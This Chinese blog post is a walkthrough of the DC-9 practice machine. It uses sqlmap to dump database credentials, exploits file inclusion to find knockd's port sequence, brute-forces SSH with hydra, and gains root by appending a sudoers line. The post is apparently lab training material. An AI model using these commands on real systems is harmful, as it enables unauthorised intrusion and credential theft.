【DC系列09】DC-9靶机复盘

文章详细描述了对一个靶机的渗透测试过程,通过扫描发现开放的22和80端口,利用SQL注入获取数据库信息,找到用户名和密码。接着揭示了文件包含漏洞,利用knockd进程开启SSH,并通过hydra爆破SSH获得用户权限。最终通过sudoers文件实现权限提升。
摘要由CSDN通过智能技术生成

【DC系列09】DC-9靶机复盘

同样我们对这个靶机进行一个扫描,先找到ip地址。

image-20230708123114261

然后再单独对这个ip地址进行扫描,发现打开了22端口和80端口,但是我们现在不能访问22端口。

image-20230708123823068

这里我们搜索以下,网址没有明显变化就是post请求,所以猜测是有数据库的。

image-20230708124323846

抓包看以下,发现的确是有post请求。

image-20230708124308518

对数据库进行一个扫描,发现有两个数据库,第一个是默认带的。

sqlmap -u 'http://192.168.102.151/results.php' --data 'search=2' --dbs --batch

image-20230708124646428

先扫描了一下user数据库,发现里面有一个表。

sqlmap -u 'http://192.168.102.151/results.php' --data 'search=1' -D users --tables --batch

image-20230708125245075

提取一下表中的列,发现有username和password.

sqlmap -u 'http://192.168.102.151/results.php' --data 'search=1' -D users -T UserDetails --columns --batch

image-20230708125337318

把用户名和密码提取出来,sqlman专门帮我们保存到了一个csv文件中去了。

sqlmap -u 'http://192.168.102.151/results.php' --data 'search=1' -D users -T UserDetails -C 'username,password' --dump

image-20230708125517965

对用户名和密码进行一个单独的保存,方便等会的爆破。

cat /root/.local/share/sqlmap/output/192.168.102.151/dump/users/UserDetails.csv|awk -F, '{print $1}' > pass

image-20230708125855084

再看看Staff数据库,发现里面有一个Users表。

sqlmap -u 'http://192.168.102.151/results.php' --data 'search=1' -D Staff --tables --batch

image-20230708125939851

发现这个表中也有一个账号密码。

sqlmap -u 'http://192.168.102.151/results.php' --data 'search=1' -D Staff -T Users --columns

image-20230708130210745

发现用户名是admin,密码是一个md5,不出以为这应该就是网站后台登陆账户。

sqlmap -u 'http://192.168.102.151/results.php' --data 'search=1' -D Staff -T Users -C 'Username,Password' --dump --batch

image-20230708130224187

破解一下md5,密码就出来了。

image-20230708130334910

后台登陆一下,发现成功登陆了上去。

image-20230708130404615

只多了一个Add Record菜单,我们提交一些数据。

image-20230708130603144

发现下面file does not exist,所以猜测这里面有个文件包含漏洞。

image-20230708130643732

尝试了以下发现果然有一个文件包含。

image-20230708130729307

/proc/sched_debug是一个Linux内核中的虚拟文件,文件包含了一个完整的调度器状态快照,包括所有运行的进程及它们的状态、进程的调度策略、调度队列、调度器的负载平衡状态等。

我们发现了knockd的进程,knockd是一个守护进程,它在后台运行,并等待接收预定义的端口序列。当它接收到正确的端口序列时,它会执行预定义的安全操作。这个过程类似于“敲门”,因此它被称为knockd。

image-20230708131645608

我们查看一下这个进程文件,发现里面是有三个参数,意思就是,当SSH按照这个顺序收到三个syn包后,ssh才可以开启。

image-20230708131726238

利用knock工具我们可以向目标主机发送三个syn包,再用nmap扫描一下,发现22端口开启了。

image-20230708132003965

这时候我们利用hyrad爆破以下ssh,用户名和密码字典就是我们sqlmap在数据库中找到的,发现有三个用户。

image-20230708132213909

经过尝试只有第三个里面有点利用东西,第一个第二个没找到线索。

image-20230708132436007

第三个用户登陆进去后ls -al发现一个隐藏目录,进去后发现有一个密码字典。

image-20230708132610725

把新发现的字典在爆破一下,发现了两个新的用户。

image-20230708133830369

登陆上fredf用户,sudo -l发现fredf用户可以免密使用root权限的文件有一个。

image-20230708133934843

image-20230708134342332

这里面的意思就是这个命令有两个参数,打开第一个文件,追加到第二个文件中去。

image-20230708134421143

既然是root权限,我们就可以提升我们这个用户的权限为ALL,和root用户权限是一样的,

把这个命令先写到一个文件中去。然后利用test命令追加到/etc/sudoers中去。

fredf ALL=(ALL:ALL) ALL

image-20230708135504826

然后sudo su -提升下自己的权限就可以了

image-20230708135348134

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值